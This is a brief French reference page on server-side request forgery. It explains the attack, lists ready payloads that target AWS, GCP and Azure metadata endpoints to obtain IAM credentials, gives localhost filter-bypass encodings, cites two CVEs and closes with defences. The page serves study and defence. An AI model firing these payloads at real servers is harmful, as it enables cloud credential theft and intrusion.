SSRF — Forcer le serveur à faire des requêtes
★★★★★
Qu'est-ce que SSRF ?
SSRF force le serveur web à faire des requêtes vers des destinations choisies par l'attaquant. En cloud, le metadata endpoint (169.254.169.254) retourne les credentials IAM AWS/GCP/Azure.
Payloads
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE # AWS
http://metadata.google.internal/computeMetadata/v1/?recursive=true # GCP
http://169.254.169.254/metadata/instance?api-version=2021-02-01 # Azure
# Bypass de filtres localhost
http://[::1]/admin
http://0177.0.0.1/
http://2130706433/
http://127.0.0.1.nip.io/ CVE
CVE-2024-21893 Ivanti SSRF pre-auth (CVSS 8.2) · CVE-2023-27163 request-baskets SSRF
Défenses
Whitelist stricte des domaines/IPs autorisés · Bloquer RFC1918 et 169.254.x · Valider le schéma URL · Firewall egress · Sur AWS : utiliser IMDSv2